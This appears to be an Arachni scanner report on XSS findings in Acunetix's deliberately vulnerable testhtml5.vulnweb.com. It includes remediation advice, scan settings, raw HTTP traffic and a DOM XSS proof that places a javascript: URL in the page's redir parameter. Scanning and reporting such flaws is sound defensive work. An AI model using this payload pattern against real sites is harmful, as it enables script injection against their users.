(Click on the bars or line points for details on the relevant issues.)
Client-side scripts are used extensively by modern web applications. They perform from simple functions (such as the formatting of text) up to full manipulation of client-side data and Operating System interaction.
Unlike traditional Cross-Site Scripting (XSS), where the client is able to inject scripts into a request and have the server return the script to the client, DOM XSS does not require that a request be sent to the server and may be abused entirely within the loaded page.
This occurs when elements of the DOM (known as the sources) are able to be manipulated to contain untrusted data, which the client-side scripts (known as the sinks) use or execute an unsafe way.
Arachni has discovered that by modifying the affected DOM source, it is possible to insert and execute JavaScript code.
| Vector type | Input name | HTTP method | Action | |
|---|---|---|---|---|
link_dom
|
url
|
GET
|
http://testhtml5.vulnweb.com/ |
Client-side scripts are used extensively by modern web applications. They perform from simple functions (such as the formatting of text) up to full manipulation of client-side data and Operating System interaction.
Cross Site Scripting (XSS) allows clients to inject scripts into a request and have the server return the script to the client in the response. This occurs because the application is taking untrusted data (in this example, from the client) and reusing it without performing any validation or sanitisation.
If the injected script is returned immediately this is known as reflected XSS. If the injected script is stored by the server and returned to any client visiting the affected page, then this is known as persistent XSS (also stored XSS).
Arachni has discovered that it is possible to insert script content directly into HTML element content.
| Vector type | Input name | HTTP method | Action | |
|---|---|---|---|---|
cookie
|
username
|
GET
|
http://testhtml5.vulnweb.com/logout | |
cookie
|
username
|
GET
|
http://testhtml5.vulnweb.com/ | |
link
|
id
|
GET
|
http://testhtml5.vulnweb.com/report | |
link
|
id
|
GET
|
http://testhtml5.vulnweb.com/like | |
link
|
id
|
GET
|
http://testhtml5.vulnweb.com/comment |
Client-side scripts are used extensively by modern web applications. They perform from simple functions (such as the formatting of text) up to full manipulation of client-side data and Operating System interaction.
Unlike traditional Cross-Site Scripting (XSS), where the client is able to inject scripts into a request and have the server return the script to the client, DOM XSS does not require that a request be sent to the server and may be abused entirely within the loaded page.
This occurs when elements of the DOM (known as the sources) are able to be manipulated to contain untrusted data, which the client-side scripts (known as the sinks) use or execute an unsafe way.
Arachni has discovered that by inserting an HTML element into the page’s DOM inputs (sources), it was possible to then have the HTML element rendered as part of the page by the sink.
| Vector type | Input name | HTTP method | Action | |
|---|---|---|---|---|
cookie_dom
|
username
|
GET
|
http://testhtml5.vulnweb.com/ |
Client-side scripts are used extensively by modern web applications. They perform from simple functions (such as the formatting of text) up to full manipulation of client-side data and Operating System interaction.
Cross Site Scripting (XSS) allows clients to inject scripts into a request and have the server return the script to the client in the response. This occurs because the application is taking untrusted data (in this example, from the client) and reusing it without performing any validation or sanitisation.
If the injected script is returned immediately this is known as reflected XSS. If the injected script is stored by the server and returned to any client visiting the affected page, then this is known as persistent XSS (also stored XSS).
Arachni has discovered that it is possible to force the page to execute custom JavaScript code.
| Vector type | Input name | HTTP method | Action | |
|---|---|---|---|---|
cookie
|
username
|
GET
|
http://testhtml5.vulnweb.com/ |
XSS flaws occur whenever an application takes untrusted data and sends it to a web browser without proper validation or escaping. XSS allows attackers to execute scripts in the victim’s browser which can hijack user sessions, deface web sites, or redirect the user to malicious sites. OWASP
Client-side scripts are used extensively by modern web applications. They perform from simple functions (such as the formatting of text) up to full manipulation of client-side data and Operating System interaction.
Cross Site Scripting (XSS) allows clients to inject scripts into a request and have the server return the script to the client in the response. This occurs because the application is taking untrusted data (in this example, from the client) and reusing it without performing any validation or sanitisation.
If the injected script is returned immediately this is known as reflected XSS. If the injected script is stored by the server and returned to any client visiting the affected page, then this is known as persistent XSS (also stored XSS).
Arachni has discovered that it is possible to insert script content directly into HTML element content.
| Vector type | Input name | HTTP method | Action | |
|---|---|---|---|---|
cookie
|
username
|
GET
|
http://testhtml5.vulnweb.com/logout | |
cookie
|
username
|
GET
|
http://testhtml5.vulnweb.com/ | |
link
|
id
|
GET
|
http://testhtml5.vulnweb.com/report | |
link
|
id
|
GET
|
http://testhtml5.vulnweb.com/like | |
link
|
id
|
GET
|
http://testhtml5.vulnweb.com/comment |
Client-side scripts are used extensively by modern web applications. They perform from simple functions (such as the formatting of text) up to full manipulation of client-side data and Operating System interaction.
Unlike traditional Cross-Site Scripting (XSS), where the client is able to inject scripts into a request and have the server return the script to the client, DOM XSS does not require that a request be sent to the server and may be abused entirely within the loaded page.
This occurs when elements of the DOM (known as the sources) are able to be manipulated to contain untrusted data, which the client-side scripts (known as the sinks) use or execute an unsafe way.
Arachni has discovered that by inserting an HTML element into the page’s DOM inputs (sources), it was possible to then have the HTML element rendered as part of the page by the sink.
| Vector type | Input name | HTTP method | Action | |
|---|---|---|---|---|
cookie_dom
|
username
|
GET
|
http://testhtml5.vulnweb.com/ |
Client-side scripts are used extensively by modern web applications. They perform from simple functions (such as the formatting of text) up to full manipulation of client-side data and Operating System interaction.
Unlike traditional Cross-Site Scripting (XSS), where the client is able to inject scripts into a request and have the server return the script to the client, DOM XSS does not require that a request be sent to the server and may be abused entirely within the loaded page.
This occurs when elements of the DOM (known as the sources) are able to be manipulated to contain untrusted data, which the client-side scripts (known as the sinks) use or execute an unsafe way.
Arachni has discovered that by modifying the affected DOM source, it is possible to insert and execute JavaScript code.
| Vector type | Input name | HTTP method | Action | |
|---|---|---|---|---|
link_dom
|
url
|
GET
|
http://testhtml5.vulnweb.com/ |
Client-side scripts are used extensively by modern web applications. They perform from simple functions (such as the formatting of text) up to full manipulation of client-side data and Operating System interaction.
Cross Site Scripting (XSS) allows clients to inject scripts into a request and have the server return the script to the client in the response. This occurs because the application is taking untrusted data (in this example, from the client) and reusing it without performing any validation or sanitisation.
If the injected script is returned immediately this is known as reflected XSS. If the injected script is stored by the server and returned to any client visiting the affected page, then this is known as persistent XSS (also stored XSS).
Arachni has discovered that it is possible to force the page to execute custom JavaScript code.
| Vector type | Input name | HTTP method | Action | |
|---|---|---|---|---|
cookie
|
username
|
GET
|
http://testhtml5.vulnweb.com/ |
xss, xss_dom, xss_dom_script_context, xss_event, xss_path, xss_script_context, xss_tag
autothrottle
{}
discovery
{}
healthmap
{}
timing_attacks
{}
uniformity
{}
"parameter_values"
|
true
|
|---|---|
"exclude_vector_patterns"
|
[]
|
"include_vector_patterns"
|
[]
|
"link_templates"
|
[]
|
"links"
|
true
|
"forms"
|
true
|
"cookies"
|
true
|
"jsons"
|
true
|
"xmls"
|
true
|
"ui_forms"
|
true
|
"ui_inputs"
|
true
|
"local_storage"
|
{}
|
|---|---|
"wait_for_elements"
|
{}
|
"pool_size"
|
6
|
"job_timeout"
|
25
|
"worker_time_to_live"
|
100
|
"ignore_images"
|
false
|
"screen_width"
|
1600
|
"screen_height"
|
1200
|
"report_path"
|
nil
|
|---|---|
"token"
|
"b6dd40ef18c8c0e60e516f82ddccd137"
|
"user_agent"
|
"Arachni/v1.4"
|
|---|---|
"request_timeout"
|
10000
|
"request_redirect_limit"
|
5
|
"request_concurrency"
|
20
|
"request_queue_size"
|
100
|
"request_headers"
|
{}
|
"response_max_size"
|
500000
|
"cookies"
|
{}
|
"authentication_type"
|
"auto"
|
"values"
|
|
||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
"default_values"
|
|
||||||||||||||||||||
"without_defaults"
|
true
|
||||||||||||||||||||
"force"
|
false
|
"redundant_path_patterns"
|
{}
|
|---|---|
"dom_depth_limit"
|
5
|
"exclude_file_extensions"
|
[]
|
"exclude_path_patterns"
|
[]
|
"exclude_content_patterns"
|
[]
|
"include_path_patterns"
|
[]
|
"restrict_paths"
|
[]
|
"extend_paths"
|
[]
|
"url_rewrites"
|
{}
|
At the time these issues were logged there were no abnormal
interferences or anomalous server behavior.
These issues are considered trusted and accurate.
Client-side scripts are used extensively by modern web applications. They perform from simple functions (such as the formatting of text) up to full manipulation of client-side data and Operating System interaction.
Unlike traditional Cross-Site Scripting (XSS), where the client is able to inject scripts into a request and have the server return the script to the client, DOM XSS does not require that a request be sent to the server and may be abused entirely within the loaded page.
This occurs when elements of the DOM (known as the sources) are able to be manipulated to contain untrusted data, which the client-side scripts (known as the sinks) use or execute an unsafe way.
Arachni has discovered that by modifying the affected DOM source, it is possible to insert and execute JavaScript code.
Client-side document rewriting, redirection, or other sensitive action, using untrusted data, should be avoided wherever possible, as these may not be inspected by server side filtering.
To remedy DOM XSS vulnerabilities where these sensitive document actions must be used, it is essential to:
document.createElement, element.setAttribute, element.appendChild,
etc. to build dynamic interfaces as opposed to HTML rendering methods such as
document.write, document.writeIn, element.innerHTML, or element.outerHTML etc.link_dom
input
url
using
GET
at
http://testhtml5.vulnweb.com/
pointing to
http://testhtml5.vulnweb.com/
.
0 1 2 3 4 | <a ng-href="#/redir?url=https://twitter.com/bradhoylman/status/991408461203279872" href="#/redir?url=https://twitter.com/bradhoylman/status/991408461203279872"> <div class="detailsboxTitle ng-binding"> Senator Brad Hoylman </div> </a> |
| Type | In | Action | Default inputs | Updated inputs |
|---|---|---|---|---|
link_dom |
http://testhtml5.vulnweb.com/ | http://testhtml5.vulnweb.com/ |
|
|
http://testhtml5.vulnweb.com/#/redir?url=javascript:window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()%2F%2F
Transitions describe the steps required to restore the state of the page, to the one it had when it was processed by the scanner, as a series of events. In essence, each transition represents a user interaction.
| # | Time | Event | Element | Options | ||
|---|---|---|---|---|---|---|
| 0 | 9.163898 | load |
page
|
|
||
| 1 | 3.86217 | request |
http://testhtml5.vulnweb.com/ |
|
||
| 2 | 3.554117 | request |
http://testhtml5.vulnweb.com/static/app/services/itemsService.js |
|
||
| 3 | 0.30496 | request |
http://testhtml5.vulnweb.com/ajax/popular?offset=0 |
|
||
| 4 | 0.812222 | request |
http://testhtml5.vulnweb.com/static/app/partials/itemsList.html |
|
||
| 5 | 0.570796 | request |
http://testhtml5.vulnweb.com/static/scr/default.png |
|
||
| 6 | 5.859242 | load |
page
|
|
Data-flow sinks track the flow of the injected taint through key points in the Javascript environment of the page. Each sink is a function which was passed tainted arguments.
Taint is:
"window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()"
| # | Object | Function | |
|---|---|---|---|
| 0 |
HTMLDocumentPrototype
|
write()
|
Inspect |
| 1 |
HTMLDocumentPrototype
|
write()
|
Inspect |
| 2 |
Window
|
decodeURIComponent()
|
Inspect |
| 3 |
Window
|
encodeURIComponent()
|
Inspect |
| 4 |
Window
|
decodeURIComponent()
|
Inspect |
Execution-flow sinks log the successful execution of an injected Javascript payload within the page's Javascript environment. Each sink is a point of payload execution.
| # | Data | |
|---|---|---|
| 0 |
No helper data logged. |
Inspect |
Raw HTTP request used to retrieve the page.
GET / HTTP/1.1 Accept-Encoding: gzip, deflate User-Agent: Arachni/v1.4 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Cookie: username=admin Accept-Language: en-US,* Host: testhtml5.vulnweb.com
Raw HTTP response used as the page basis. (Binary bodies will not be displayed.)
HTTP/1.1 200 OK
Server: nginx/1.4.1
Date: Mon, 26 Jan 1970 07:00:46 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
Access-Control-Allow-Origin: *
Content-Encoding: gzip
<script src="http://javascript.browser.arachni/polyfills.js"></script> <!-- Injected by Arachni::Browser::Javascript -->
<script src="http://javascript.browser.arachni/taint_tracer.js"></script> <!-- Injected by Arachni::Browser::Javascript -->
<script src="http://javascript.browser.arachni/dom_monitor.js"></script> <!-- Injected by Arachni::Browser::Javascript -->
<script>
/* arachni_js_namespace_initialize_start */ _arachni_js_namespaceTaintTracer.initialize({"window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()":{"stop_at_first":false,"trace":true},"username":{"stop_at_first":true,"trace":false},"admin":{"stop_at_first":true,"trace":false}}) /* arachni_js_namespace_initialize_stop */
window._arachni_js_namespace = true;
/* arachni_js_namespace_code_start */ /* arachni_js_namespace_code_stop */
</script> <!-- Injected by Arachni::Browser::Javascript -->
<!DOCTYPE html>
<html lang="en" xmlns="http://www.w3.org/1999/html" data-ng-app="itemsApp">
<head>
<meta charset="utf-8">
<title>SecurityTweets - HTML5 test website for Acunetix Web Vulnerability Scanner</title>
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<meta name="description" content="">
<meta name="author" content="">
<!-- Le styles -->
<link href="http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/css/bootstrap-combined.min.css" rel="stylesheet">
<link href='http://fonts.googleapis.com/css?family=Lora:400,700,400italic,700italic' rel='stylesheet' type='text/css'>
<link href="/static/css/style.css" rel="stylesheet">
<link rel="icon" type="image/png" href="http://www.acunetix.com/favicon.ico">
<style type="text/css">
body {
padding-top: 60px;
padding-bottom: 40px;
}
.sidebar-nav {
padding: 9px 0;
}
@media (max-width: 980px) {
/* Enable use of floated navbar text */
.navbar-text.pull-right {
float: none;
padding-left: 5px;
padding-right: 5px;
}
}
</style>
</head>
<body>
<div class="navbar navbar-fixed-top">
<div class="navbar-inner">
<div class="container-fluid">
<button type="button" class="btn btn-navbar" data-toggle="collapse" data-target=".nav-collapse">
<span class="icon-bar"></span>
<span class="icon-bar"></span>
<span class="icon-bar"></span>
</button>
<a class="brand" href="https://www.acunetix.com/"><img src="/static/img/logo2.png" alt="Acunetix website security"> </a>
<p class="navbar-text pull-left">
Vulnerable HTML5 test website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a>.
</p>
<p class="navbar-text pull-right">
Welcome <b>admin</b> | <a href='/logout'>Logout</a>
</p>
</div>
</div>
</div>
<div class="container-fluid">
<div class="row-fluid">
<div class="span2">
<div class="well sidebar-nav">
<ul class="nav nav-list">
<li class="nav-header">Views</li>
<li id="popularLi" class="active"><a href="#/popular">Popular</a></li>
<li><a href="#/latest">Latest</a></li>
<li><a href="#/carousel">Carousel</a></li>
<li><a href="#/archive">Archive</a></li>
<li class="nav-header">Website</li>
<li><a href="#/about">About</a></li>
<li><a href="#/contact">Contact</a></li>
<li class="nav-header">Acunetix</li>
<li><a target="_blank" href="http://www.acunetix.com/">Website</a></li>
<li><a target="_blank" href="http://www.acunetix.com/vulnerability-scanner/html5-website-security/">HTML5 scanner</a></li>
<li><a target="_blank" href="http://www.acunetix.com/vulnerability-scanner/crawling-html5-javascript-websites/">HTML5 vuln help</a></li>
<li><a target="_blank" href="http://www.acunetix.com/blog/">Blog</a></li>
<li><a target="_blank" href="http://www.facebook.com/Acunetix">Facebook</a></li>
<li><a target="_blank" href="http://www.twitter.com/acunetix/">Twitter</a></li>
</ul>
</div><!--/.well -->
</div><!--/span-->
<div class="span10">
<div class="row-fluid">
<div ng-view></div>
</div><!--/row-->
</div><!--/span-->
</div><!--/row-->
<hr>
<div class="row-fluid">
<div class="pull-left" style="font-size: xx-small;" id="refId"></div>
</div>
<div style="background-color:lightgray;width:100%;text-align:center;font-size:14px">
<p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This is an HTML5 application that is vulnerable by design. This is not a real collection of tweets. This application was created so that you can test your Acunetix, other tools, or your manual penetration testing skills. The application code is prone to attacks such as Cross-site Scripting (XSS) and XML External Entity (XXE). Links presented on this site have no affiliation to the site and are here only as samples.</p>
</div>
<footer>
<p class="pull-left">© Acunetix Ltd. 2019</p>
</footer>
</div><!--/.fluid-container-->
<!-- Modal -->
<div id="myModal" class="modal hide fade" tabindex="-1" role="dialog" aria-labelledby="myModalLabel" aria-hidden="true">
<form class="modal-body" action="/login" method="POST" id="loginForm">
<div class="modal-header">
<button type="button" class="close" data-dismiss="modal" aria-hidden="true">×</button>
<h3 id="myModalLabel">Login</h3>
</div>
<div class="modal-body">
<div class="control-group">
<!-- Username -->
<label class="control-label" for="username">Username</label>
<div class="controls">
<input type="text" id="username" name="username" placeholder="" class="input-xlarge" value="admin">
</div>
</div>
<div class="control-group">
<!-- Password-->
<label class="control-label" for="password">Password</label>
<div class="controls">
<input type="password" id="password" name="password" placeholder="" class="input-xlarge">
</div>
</div>
<div class="control-group">
<a href="#" class="btn" id="loginFormForgot">Forgot Pwd?</a>
</div>
</div>
<div class="modal-footer">
<button class="btn btn-primary" id="loginFormSubmit">Login</button>
<button class="btn" data-dismiss="modal" aria-hidden="true">Close</button>
</div>
</form>
</div>
<!-- Le javascript
================================================== -->
<!-- Placed at the end of the document so the pages load faster -->
<script src="http://code.jquery.com/jquery-1.9.1.min.js">
// Injected by Arachni::Browser::Javascript
_arachni_js_namespaceTaintTracer.update_tracers();
_arachni_js_namespaceDOMMonitor.update_trackers();
</script>
<script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript -->
<script src="http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/js/bootstrap.min.js">
// Injected by Arachni::Browser::Javascript
_arachni_js_namespaceTaintTracer.update_tracers();
_arachni_js_namespaceDOMMonitor.update_trackers();
</script>
<script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript -->
<script src="https://ajax.googleapis.com/ajax/libs/angularjs/1.0.6/angular.min.js">
// Injected by Arachni::Browser::Javascript
_arachni_js_namespaceTaintTracer.update_tracers();
_arachni_js_namespaceDOMMonitor.update_trackers();
</script>
<script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript -->
<!-- App libs -->
<script src="/static/app/app.js">
// Injected by Arachni::Browser::Javascript
_arachni_js_namespaceTaintTracer.update_tracers();
_arachni_js_namespaceDOMMonitor.update_trackers();
</script>
<script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript -->
<script src="/static/app/libs/sessvars.js">
// Injected by Arachni::Browser::Javascript
_arachni_js_namespaceTaintTracer.update_tracers();
_arachni_js_namespaceDOMMonitor.update_trackers();
</script>
<script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript -->
<script src="/static/app/post.js">
// Injected by Arachni::Browser::Javascript
_arachni_js_namespaceTaintTracer.update_tracers();
_arachni_js_namespaceDOMMonitor.update_trackers();
</script>
<script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript -->
<script src="/static/app/controllers/controllers.js">
// Injected by Arachni::Browser::Javascript
_arachni_js_namespaceTaintTracer.update_tracers();
_arachni_js_namespaceDOMMonitor.update_trackers();
</script>
<script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript -->
<script src="/static/app/services/itemsService.js">
// Injected by Arachni::Browser::Javascript
_arachni_js_namespaceTaintTracer.update_tracers();
_arachni_js_namespaceDOMMonitor.update_trackers();
</script>
<script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript -->
<script src="http://bxss.s3.amazonaws.com/ad.js">
// Injected by Arachni::Browser::Javascript
_arachni_js_namespaceTaintTracer.update_tracers();
_arachni_js_namespaceDOMMonitor.update_trackers();
</script>
<script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript -->
</body>
</html>
This is the browser-evaluated body, as a result of the listed transitions.
0 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193 194 195 196 197 198 199 200 201 202 203 204 205 206 207 208 209 210 211 212 213 214 215 216 217 218 219 220 221 222 223 224 225 226 227 228 229 230 231 232 233 234 235 236 237 238 239 240 241 242 243 244 245 246 247 248 249 250 251 252 253 254 255 256 257 258 259 260 261 262 263 264 265 266 267 268 269 270 271 272 273 | <html lang="en" xmlns="http://www.w3.org/1999/html" data-ng-app="itemsApp" class="ng-scope" data-arachni-id="-718801808"><head><script src="http://javascript.browser.arachni/polyfills.js"></script> <!-- Injected by Arachni::Browser::Javascript --> <script src="http://javascript.browser.arachni/taint_tracer.js"></script> <!-- Injected by Arachni::Browser::Javascript --> <script src="http://javascript.browser.arachni/dom_monitor.js"></script> <!-- Injected by Arachni::Browser::Javascript --> <script> /* arachni_js_namespace_initialize_start */ _arachni_js_namespaceTaintTracer.initialize({"window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()":{"stop_at_first":false,"trace":true},"username":{"stop_at_first":true,"trace":false},"admin":{"stop_at_first":true,"trace":false}}) /* arachni_js_namespace_initialize_stop */ window._arachni_js_namespace = true; /* arachni_js_namespace_code_start */ /* arachni_js_namespace_code_stop */ </script> <!-- Injected by Arachni::Browser::Javascript --> <meta charset="utf-8"> <title>SecurityTweets - HTML5 test website for Acunetix Web Vulnerability Scanner</title> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <meta name="description" content=""> <meta name="author" content=""> <!-- Le styles --> <link href="http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/css/bootstrap-combined.min.css" rel="stylesheet"> <link href="http://fonts.googleapis.com/css?family=Lora:400,700,400italic,700italic" rel="stylesheet" type="text/css"> <link href="/static/css/style.css" rel="stylesheet"> <link rel="icon" type="image/png" href="http://www.acunetix.com/favicon.ico"> <style type="text/css"> body { padding-top: 60px; padding-bottom: 40px; } .sidebar-nav { padding: 9px 0; } @media (max-width: 980px) { /* Enable use of floated navbar text */ .navbar-text.pull-right { float: none; padding-left: 5px; padding-right: 5px; } } </style> <style type="text/css">@charset "UTF-8";[ng\:cloak],[ng-cloak],[data-ng-cloak],[x-ng-cloak],.ng-cloak,.x-ng-cloak{display:none;}ng\:form{display:block;}</style></head> <body> <div class="navbar navbar-fixed-top"> <div class="navbar-inner"> <div class="container-fluid"> <button type="button" class="btn btn-navbar" data-toggle="collapse" data-target=".nav-collapse"> <span class="icon-bar"></span> <span class="icon-bar"></span> <span class="icon-bar"></span> </button> <a class="brand" href="https://www.acunetix.com/" data-arachni-id="-59717636"><img src="/static/img/logo2.png" alt="Acunetix website security"> </a> <p class="navbar-text pull-left"> Vulnerable HTML5 test website for <a href="https://www.acunetix.com/vulnerability-scanner/" data-arachni-id="-1395254329">Acunetix Web Vulnerability Scanner</a>. </p> <p class="navbar-text pull-right"> Welcome <b>admin</b> | <a href="/logout" data-arachni-id="-2013462102">Logout</a> </p> </div> </div> </div> <div class="container-fluid"> <div class="row-fluid"> <div class="span2"> <div class="well sidebar-nav"> <ul class="nav nav-list"> <li class="nav-header">Views</li> <li id="popularLi" class="active"><a href="#/popular" data-arachni-id="1270713017">Popular</a></li> <li><a href="#/latest" data-arachni-id="-2026013785">Latest</a></li> <li><a href="#/carousel" data-arachni-id="67552640">Carousel</a></li> <li><a href="#/archive" data-arachni-id="916551842">Archive</a></li> <li class="nav-header">Website</li> <li><a href="#/about" data-arachni-id="63058797">About</a></li> <li><a href="#/contact" data-arachni-id="-1678787584">Contact</a></li> <li class="nav-header">Acunetix</li> <li><a target="_blank" href="http://www.acunetix.com/" data-arachni-id="-1405978501">Website</a></li> <li><a target="_blank" href="http://www.acunetix.com/vulnerability-scanner/html5-website-security/" data-arachni-id="166919624">HTML5 scanner</a></li> <li><a target="_blank" href="http://www.acunetix.com/vulnerability-scanner/crawling-html5-javascript-websites/" data-arachni-id="-1519928118">HTML5 vuln help</a></li> <li><a target="_blank" href="http://www.acunetix.com/blog/" data-arachni-id="2073538">Blog</a></li> <li><a target="_blank" href="http://www.facebook.com/Acunetix" data-arachni-id="561774310">Facebook</a></li> <li><a target="_blank" href="http://www.twitter.com/acunetix/" data-arachni-id="748307027">Twitter</a></li> </ul> </div><!--/.well --> </div><!--/span--> <div class="span10"> <div class="row-fluid"> <div ng-view=""><script src="http://javascript.browser.arachni/polyfills.js" class="ng-scope"></script> <!-- Injected by Arachni::Browser::Javascript --> <script src="http://javascript.browser.arachni/taint_tracer.js" class="ng-scope"></script> <!-- Injected by Arachni::Browser::Javascript --> <script src="http://javascript.browser.arachni/dom_monitor.js" class="ng-scope"></script> <!-- Injected by Arachni::Browser::Javascript --> <script class="ng-scope"> /* arachni_js_namespace_initialize_start */ _arachni_js_namespaceTaintTracer.initialize({"xss_dom_0c25785427908905790d3a663dc49fa7":{"stop_at_first":false,"trace":true}}) /* arachni_js_namespace_initialize_stop */ window._arachni_js_namespace = true; /* arachni_js_namespace_code_start */ /* arachni_js_namespace_code_stop */ </script> <!-- Injected by Arachni::Browser::Javascript --> <title class="ng-scope">Loading ...</title> <script class="ng-scope"> // Injected by Arachni::Browser::Javascript _arachni_js_namespaceTaintTracer.update_tracers(); _arachni_js_namespaceDOMMonitor.update_trackers(); var redirUrl = decodeURIComponent(window.location.hash.slice(window.location.hash.indexOf("?url=")+5)); if (redirUrl) window.location = redirUrl; </script> <script type="text/javascript" class="ng-scope">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript --> </div> </div><!--/row--> </div><!--/span--> </div><!--/row--> <hr> <div class="row-fluid"> <div class="pull-left" style="font-size: xx-small;" id="refId">admin is coming from <b>unknown</b> and has visited this page <b>2</b> times.</div> </div> <div style="background-color:lightgray;width:100%;text-align:center;font-size:14px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This is an HTML5 application that is vulnerable by design. This is not a real collection of tweets. This application was created so that you can test your Acunetix, other tools, or your manual penetration testing skills. The application code is prone to attacks such as Cross-site Scripting (XSS) and XML External Entity (XXE). Links presented on this site have no affiliation to the site and are here only as samples.</p> </div> <footer> <p class="pull-left">© Acunetix Ltd. 2019</p> </footer> </div><!--/.fluid-container--> <!-- Modal --> <div id="myModal" class="modal hide fade" tabindex="-1" role="dialog" aria-labelledby="myModalLabel" aria-hidden="true"> <form class="modal-body ng-pristine ng-valid" action="/login" method="POST" id="loginForm"> <div class="modal-header"> <button type="button" class="close" data-dismiss="modal" aria-hidden="true">×</button> <h3 id="myModalLabel">Login</h3> </div> <div class="modal-body"> <div class="control-group"> <!-- Username --> <label class="control-label" for="username">Username</label> <div class="controls"> <input type="text" id="username" name="username" placeholder="" class="input-xlarge" value="admin"> </div> </div> <div class="control-group"> <!-- Password--> <label class="control-label" for="password">Password</label> <div class="controls"> <input type="password" id="password" name="password" placeholder="" class="input-xlarge"> </div> </div> <div class="control-group"> <a href="#" class="btn" id="loginFormForgot">Forgot Pwd?</a> </div> </div> <div class="modal-footer"> <button class="btn btn-primary" id="loginFormSubmit">Login</button> <button class="btn" data-dismiss="modal" aria-hidden="true">Close</button> </div> </form> </div> <!-- Le javascript ================================================== --> <!-- Placed at the end of the document so the pages load faster --> <script src="http://code.jquery.com/jquery-1.9.1.min.js"> // Injected by Arachni::Browser::Javascript _arachni_js_namespaceTaintTracer.update_tracers(); _arachni_js_namespaceDOMMonitor.update_trackers(); </script> <script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript --> <script src="http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/js/bootstrap.min.js"> // Injected by Arachni::Browser::Javascript _arachni_js_namespaceTaintTracer.update_tracers(); _arachni_js_namespaceDOMMonitor.update_trackers(); </script> <script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript --> <script src="https://ajax.googleapis.com/ajax/libs/angularjs/1.0.6/angular.min.js"> // Injected by Arachni::Browser::Javascript _arachni_js_namespaceTaintTracer.update_tracers(); _arachni_js_namespaceDOMMonitor.update_trackers(); </script> <script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript --> <!-- App libs --> <script src="/static/app/app.js"> // Injected by Arachni::Browser::Javascript _arachni_js_namespaceTaintTracer.update_tracers(); _arachni_js_namespaceDOMMonitor.update_trackers(); </script> <script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript --> <script src="/static/app/libs/sessvars.js"> // Injected by Arachni::Browser::Javascript _arachni_js_namespaceTaintTracer.update_tracers(); _arachni_js_namespaceDOMMonitor.update_trackers(); </script> <script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript --> <script src="/static/app/post.js"> // Injected by Arachni::Browser::Javascript _arachni_js_namespaceTaintTracer.update_tracers(); _arachni_js_namespaceDOMMonitor.update_trackers(); </script><div class="fb-comments" data-num-posts="4" data-width="470" data-href="http://testhtml5.vulnweb.com/#/redir?url=javascript:window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()//"></div> 